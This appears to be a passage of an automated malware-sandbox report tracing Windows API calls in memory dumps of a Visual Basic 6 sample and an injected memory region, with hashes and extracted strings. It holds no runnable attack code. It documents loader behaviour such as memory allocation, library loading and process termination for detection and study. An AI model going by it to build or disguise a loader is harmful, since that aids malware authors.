                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • LoadLibraryA.KERNELBASE(?,082962C8,?,02BC07A4,?,?), ref: 02BC655D
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • EnumWindows.USER32(02BC0764,?,00000000,00000000,02BC0CD2,00000000,?,00003000,00000004), ref: 02BC0748
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: EnumWindows
                              • String ID:
                              • API String ID: 1129996299-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • LoadLibraryA.KERNELBASE(?,082962C8,?,02BC07A4,?,?), ref: 02BC655D
                                • Part of subcall function 02BC42FD: LdrInitializeThunk.NTDLL(?,?,?,02BC1656,00000000,00000000,00000000,00000000,00000105,0000034D,?,02BC3E1B,?,?,00000004), ref: 02BC4E03
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: InitializeLibraryLoadThunk
                              • String ID:
                              • API String ID: 3353482560-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • LoadLibraryA.KERNELBASE(?,082962C8,?,02BC07A4,?,?), ref: 02BC655D
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • LdrInitializeThunk.NTDLL(?,?,?,02BC1656,00000000,00000000,00000000,00000000,00000105,0000034D,?,02BC3E1B,?,?,00000004), ref: 02BC4E03
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • LoadLibraryA.KERNELBASE(?,082962C8,?,02BC07A4,?,?), ref: 02BC655D
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,02BC3C09,02BC3DCF,02BC08FD), ref: 02BC3DB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,?,00000004,00000000), ref: 02BC35CA
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID:
                              • API String ID: 560597551-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • VirtualAlloc.KERNELBASE(00000000,0000D000,00000960,00000040,?,?,0E000000), ref: 00402015
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • VirtualAlloc.KERNELBASE(00000000,0000D000,00000960,00000040,?,?,0E000000), ref: 00402015
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • VirtualAlloc.KERNELBASE(00000000,0000D000,00000960,00000040,?,?,0E000000), ref: 00402015
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • VirtualAlloc.KERNELBASE(00000000,0000D000,00000960,00000040,?,?,0E000000), ref: 00402015
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • VirtualAlloc.KERNELBASE(00000000,0000D000,00000960,00000040,?,?,0E000000), ref: 00402015
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • VirtualAlloc.KERNELBASE(00000000,0000D000,00000960,00000040,?,?,0E000000), ref: 00402015
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • VirtualAlloc.KERNELBASE(00000000,0000D000,00000960,00000040,?,?,0E000000), ref: 00402015
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • VirtualAlloc.KERNELBASE(00000000,0000D000,00000960,00000040,?,?,0E000000), ref: 00402015
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp
                              Similarity
                              • API ID: AllocVirtual
                              • String ID:
                              • API String ID: 4275171209-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID: D6
                              • API String ID: 0-4158169993
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: LibraryLoadMemoryProtectVirtual
                              • String ID:
                              • API String ID: 3389902171-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID: LibraryLoadMemoryProtectVirtual
                              • String ID:
                              • API String ID: 3389902171-0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000000.00000002.346980788.0000000002BC0000.00000040.00000001.sdmp, Offset: 02BC0000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __vbaVarDup.MSVBVM60 ref: 00410D00
                              • #628.MSVBVM60(FGFG,00000001,?), ref: 00410D1C
                              • __vbaStrMove.MSVBVM60 ref: 00410D27
                              • __vbaStrCmp.MSVBVM60(0040C464,00000000), ref: 00410D33
                              • __vbaFreeStr.MSVBVM60 ref: 00410D46
                              • __vbaFreeVar.MSVBVM60 ref: 00410D4F
                              • __vbaNew2.MSVBVM60(0040C6EC,Xs), ref: 00410D71
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410D8A
                              • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C400,00000160), ref: 00410DB1
                              • _adj_fdiv_m64.MSVBVM60 ref: 00410DDD
                              • __vbaFpI4.MSVBVM60(43540000,?,43520000), ref: 00410E08
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040BE78,000002C0,?,43520000), ref: 00410E41
                              • __vbaFreeObj.MSVBVM60(?,43520000), ref: 00410E4A
                              • __vbaFreeVar.MSVBVM60(00410E7E), ref: 00410E77
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp
                              Similarity
                              • API ID: __vba$Free$CheckHresult$#628MoveNew2_adj_fdiv_m64
                              • String ID: FGFG$Xs
                              • API String ID: 3842582943-3903072984
                              • Opcode ID: 5cdf4f7aa4bab04db8c6e0c23bb876003ede648bbddc308957fda3565e09b4fd
                              • Instruction ID: 093d746ca1beb0e40c0a7d72c9ebd4a8ae905701a5bb8c22c8cbfacd13d34702
                              • Opcode Fuzzy Hash: 5cdf4f7aa4bab04db8c6e0c23bb876003ede648bbddc308957fda3565e09b4fd
                              • Instruction Fuzzy Hash: 6C414C71940208EFDB00DFA0ED89EEEBBB8FB58701F10456AF446B65A0D7745985CBA8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __vbaI4Str.MSVBVM60(0040C4EC), ref: 00411BB1
                              • #608.MSVBVM60(?,00000000), ref: 00411BBC
                              • __vbaVarTstNe.MSVBVM60(?,?), ref: 00411BD8
                              • __vbaFreeVar.MSVBVM60 ref: 00411BE4
                              • __vbaNew2.MSVBVM60(0040C430,00413338), ref: 00411C05
                              • __vbaHresultCheckObj.MSVBVM60(00000000,02B0E8CC,0040C420,0000001C), ref: 00411C2A
                              • __vbaNew2.MSVBVM60(0040C6EC,Xs), ref: 00411C54
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 00411C6D
                              • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C2D0,000000C8), ref: 00411C94
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040C2A8,00000060), ref: 00411CCF
                              • __vbaFreeStr.MSVBVM60 ref: 00411CD8
                              • __vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 00411CE8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp
                              Similarity
                              • API ID: __vba$CheckFreeHresult$New2$#608List
                              • String ID: Xs
                              • API String ID: 2089189435-372796199
                              • Opcode ID: 659d66c965104f53d4b8aff3c92df3738a224c8845931493a569beb9731aa454
                              • Instruction ID: ba91b5a22035b1221881042807dc12a98ba8536124ff2b7386bd0a3c153fbe2e
                              • Opcode Fuzzy Hash: 659d66c965104f53d4b8aff3c92df3738a224c8845931493a569beb9731aa454
                              • Instruction Fuzzy Hash: 44514F74941249EFCB10DF94DA89EEEBBB8FB08701F10816EF506B72A0D7785949CB58
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __vbaVarDup.MSVBVM60 ref: 004119DF
                              • __vbaNew2.MSVBVM60(0040C6EC,Xs), ref: 004119F8
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 00411A11
                              • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C220,00000098), ref: 00411A38
                              • __vbaVarErrI4.MSVBVM60(?,?), ref: 00411A47
                              • #559.MSVBVM60(00000000), ref: 00411A4E
                              • __vbaFreeObj.MSVBVM60 ref: 00411A64
                              • __vbaFreeVar.MSVBVM60 ref: 00411A6D
                              • _adj_fdiv_m64.MSVBVM60 ref: 00411AA1
                              • __vbaFpI4.MSVBVM60(42C60000,?,434C0000), ref: 00411ACA
                              • __vbaHresultCheckObj.MSVBVM60(00000000,004012E8,0040BE78,000002C0,?,434C0000), ref: 00411AFE
                              • __vbaFreeVar.MSVBVM60(00411B20), ref: 00411B19
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp
                              Similarity
                              • API ID: __vba$Free$CheckHresult$#559New2_adj_fdiv_m64
                              • String ID: Xs
                              • API String ID: 2205265000-372796199
                              • Opcode ID: 5893cf91ef0c402c3b6b507d2bb24c4761498f53c068710e4455f6b736da4c57
                              • Instruction ID: cfc31587479a2b37b5b9cab80607fe22404b2ed885f496ad5160353065e4b232
                              • Opcode Fuzzy Hash: 5893cf91ef0c402c3b6b507d2bb24c4761498f53c068710e4455f6b736da4c57
                              • Instruction Fuzzy Hash: 52417B70900245EBCB10DFA4DD88EEEBBB8FF48741F10856EF546B25A0D7386985CB58
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp
                              Similarity
                              • API ID: __vba$Free$#513#568CopyList
                              • String ID:
                              • API String ID: 64076409-0
                              • Opcode ID: 44fe875feb4c02afd4ca720c18ce635559e161022008ce4a285e875b8da64697
                              • Instruction ID: 1f1893001a5af6aa49567691b2b395c5e626477f8212ca2baeeededcd327da5f
                              • Opcode Fuzzy Hash: 44fe875feb4c02afd4ca720c18ce635559e161022008ce4a285e875b8da64697
                              • Instruction Fuzzy Hash: 233104B1C0021DDBCB10DF94D985ADDBBB8FF48704F00815AE55AB7264DBB42A4ACFA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __vbaVarDup.MSVBVM60 ref: 004114D6
                              • #671.MSVBVM60(00000000,00000000,00000000,40000000,00000000,40000000), ref: 004114EA
                              • __vbaFpR8.MSVBVM60 ref: 004114F0
                              • __vbaNew2.MSVBVM60(0040C6EC,Xs), ref: 0041151A
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 00411533
                              • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C1E4,00000060), ref: 00411554
                              • __vbaHresultCheckObj.MSVBVM60(00000000,00401280,0040BE78,00000084), ref: 00411594
                              • __vbaFreeObj.MSVBVM60 ref: 0041159D
                              • __vbaFreeVar.MSVBVM60(004115BF), ref: 004115B8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp
                              Similarity
                              • API ID: __vba$CheckFreeHresult$#671New2
                              • String ID: Xs
                              • API String ID: 4049541443-372796199
                              • Opcode ID: 73bcbe974962e1ae1e79b2cb4d2cee651bb4f5a86f4de7ba214234eddb9b0f6b
                              • Instruction ID: 2d5a380156fd8f89c0864547aa3dbd65d3f9fb6378abbf669dc0730c2745e642
                              • Opcode Fuzzy Hash: 73bcbe974962e1ae1e79b2cb4d2cee651bb4f5a86f4de7ba214234eddb9b0f6b
                              • Instruction Fuzzy Hash: 89318F70900208EBCB009FA5DE89FDEBBB8FB48705F10856AF546B21A0D7345985CF69
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __vbaVarDup.MSVBVM60 ref: 004111DC
                              • __vbaVarDup.MSVBVM60 ref: 004111F2
                              • #558.MSVBVM60(?), ref: 004111F8
                              • __vbaFreeVar.MSVBVM60 ref: 0041120F
                              • __vbaNew2.MSVBVM60(0040C430,00413338), ref: 0041122C
                              • __vbaHresultCheckObj.MSVBVM60(00000000,02B0E8CC,0040C420,00000034), ref: 0041127C
                              • __vbaObjSet.MSVBVM60(?,?), ref: 0041128D
                              • __vbaFreeObj.MSVBVM60(004112C1), ref: 004112B1
                              • __vbaFreeVar.MSVBVM60 ref: 004112BA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp
                              Similarity
                              • API ID: __vba$Free$#558CheckHresultNew2
                              • String ID: PORPHYRY
                              • API String ID: 3535509826-1558576227
                              • Opcode ID: d609becf9e89978e7bc363c5d9c2fc61c07ef93f7b6951d34eb425f43fcd2d51
                              • Instruction ID: d8154db5369cdc37ccb21bd4bad5315eca1b4abec945426c7a85ad7eb729151d
                              • Opcode Fuzzy Hash: d609becf9e89978e7bc363c5d9c2fc61c07ef93f7b6951d34eb425f43fcd2d51
                              • Instruction Fuzzy Hash: AB315BB1C40258DBCB00DF98DD89AEDBBB8FF58704F10811AE901B7664D7741949CB99
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __vbaVarDup.MSVBVM60 ref: 0041135D
                              • __vbaUI1Str.MSVBVM60(0040C498), ref: 00411364
                              • __vbaVarDup.MSVBVM60 ref: 004113C6
                              • #596.MSVBVM60(?,?,?,?,?,?,?), ref: 004113EA
                              • __vbaStrMove.MSVBVM60 ref: 004113F5
                              • __vbaFreeVarList.MSVBVM60(00000007,?,?,?,?,?,?,?), ref: 0041141F
                              • __vbaFreeStr.MSVBVM60(00411470), ref: 00411460
                              • __vbaFreeVar.MSVBVM60 ref: 00411469
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp
                              Similarity
                              • API ID: __vba$Free$#596ListMove
                              • String ID: energies
                              • API String ID: 3067788333-3455773497
                              • Opcode ID: 0c3064115717f1ac50398ab6b92702e3a18299170401f4184021512798b3afa1
                              • Instruction ID: 9c9f750e3ffaf1b94bc787d7f40b5fab412ab773200aaa50e83ef5503dfdb722
                              • Opcode Fuzzy Hash: 0c3064115717f1ac50398ab6b92702e3a18299170401f4184021512798b3afa1
                              • Instruction Fuzzy Hash: B141B3B1C10228EFCB55CF98D885ADEBFB8FB49700F10816BE14AA7650DB741689CF94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __vbaVarDup.MSVBVM60 ref: 00410EEF
                              • #588.MSVBVM60(00000002,00000001,00000000), ref: 00410EFA
                              • __vbaNew2.MSVBVM60(0040C430,00413338), ref: 00410F1D
                              • __vbaHresultCheckObj.MSVBVM60(00000000,02B0E8CC,0040C420,0000001C), ref: 00410F42
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040C2A8,00000054), ref: 00410F86
                              • __vbaLateIdSt.MSVBVM60(?,00000000), ref: 00410FBD
                              • __vbaFreeObj.MSVBVM60 ref: 00410FC6
                              • __vbaFreeVar.MSVBVM60 ref: 00410FCF
                              • __vbaFreeVar.MSVBVM60(0041100C), ref: 00410FFC
                              • __vbaFreeObj.MSVBVM60 ref: 00411005
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp
                              Similarity
                              • API ID: __vba$Free$CheckHresult$#588LateNew2
                              • String ID:
                              • API String ID: 560782363-0
                              • Opcode ID: 48c36fe9d6eda2cf18a4be4725bed0e60cbf133814d75f6b630ae208fcf50c1b
                              • Instruction ID: b1583988c7a680b9ac489e468f2f848dc458502062e59417e504937bc2f0808b
                              • Opcode Fuzzy Hash: 48c36fe9d6eda2cf18a4be4725bed0e60cbf133814d75f6b630ae208fcf50c1b
                              • Instruction Fuzzy Hash: C0412770D40208EBCB14DF98D989A9DFBB8FF58705F10816AE405B72A0D7B49885CF98
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __vbaVarDup.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00411627
                              • __vbaNew2.MSVBVM60(0040C6EC,Xs), ref: 00411640
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 00411659
                              • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C298,000001EC), ref: 004116A1
                              • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 004116AA
                              • __vbaFreeVar.MSVBVM60(004116CB), ref: 004116C4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp
                              Similarity
                              • API ID: __vba$Free$CheckHresultNew2
                              • String ID: LIMBERNESS$Xs
                              • API String ID: 4204301268-3945506932
                              • Opcode ID: 479aa5d71300ef31ccf78b96ab9ab54f3f59671d624f5b31244e8f81c71c1d86
                              • Instruction ID: ad877ba553e5b8492a8822e7f69b06417b44fdc95c1657ee7c0d5625b49b595c
                              • Opcode Fuzzy Hash: 479aa5d71300ef31ccf78b96ab9ab54f3f59671d624f5b31244e8f81c71c1d86
                              • Instruction Fuzzy Hash: 97218E70A40204DBCB00DF98DE89BDDBBB8FB48701F14856AF505F76A0D7795940CBA8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00410BE9
                              • __vbaNew2.MSVBVM60(0040C6EC,Xs), ref: 00410C02
                              • __vbaObjSet.MSVBVM60(?,00000000), ref: 00410C1B
                              • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040C190,00000228), ref: 00410C5B
                              • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00410C64
                              • __vbaFreeStr.MSVBVM60(00410C85), ref: 00410C7E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.345582031.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000000.00000002.345602709.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000000.00000002.345610424.0000000000414000.00000002.00020000.sdmp
                              Similarity
                              • API ID: __vba$Free$CheckCopyHresultNew2
                              • String ID: Xs
                              • API String ID: 4138333463-372796199
                              • Opcode ID: 18945dcca7cc5c7842d0a287a9409329b85a5416c47885c6f3626c1cd877690d
                              • Instruction ID: 505a2d3dfff38582ee8a76d0fe486d04ccf630b49b12cde1ac143765decea39c
                              • Opcode Fuzzy Hash: 18945dcca7cc5c7842d0a287a9409329b85a5416c47885c6f3626c1cd877690d
                              • Instruction Fuzzy Hash: F9212C70900204EBCB04DFA8D989ADDBBF8FB5C300F10856AE445E7264D7789981CF98
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • __vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00410AFA
                              • __vbaNew2.MSVBVM60(0040C430,00413338,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00410B12
                              • __vbaHresultCheckObj.MSVBVM60(00000000,02B0E8CC,0040C420,00000014,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00410B37
                              • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040C440,00000070,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00410B5B
                              • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00410B64
                              • __vbaFreeStr.MSVBVM60(00410B85,?,?,?,?,?,?,?,?,?,?,?,00401316), ref: 00410B7E
                              Memory Dump Source
                              • Source File: 00000000.00000002.345586766.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
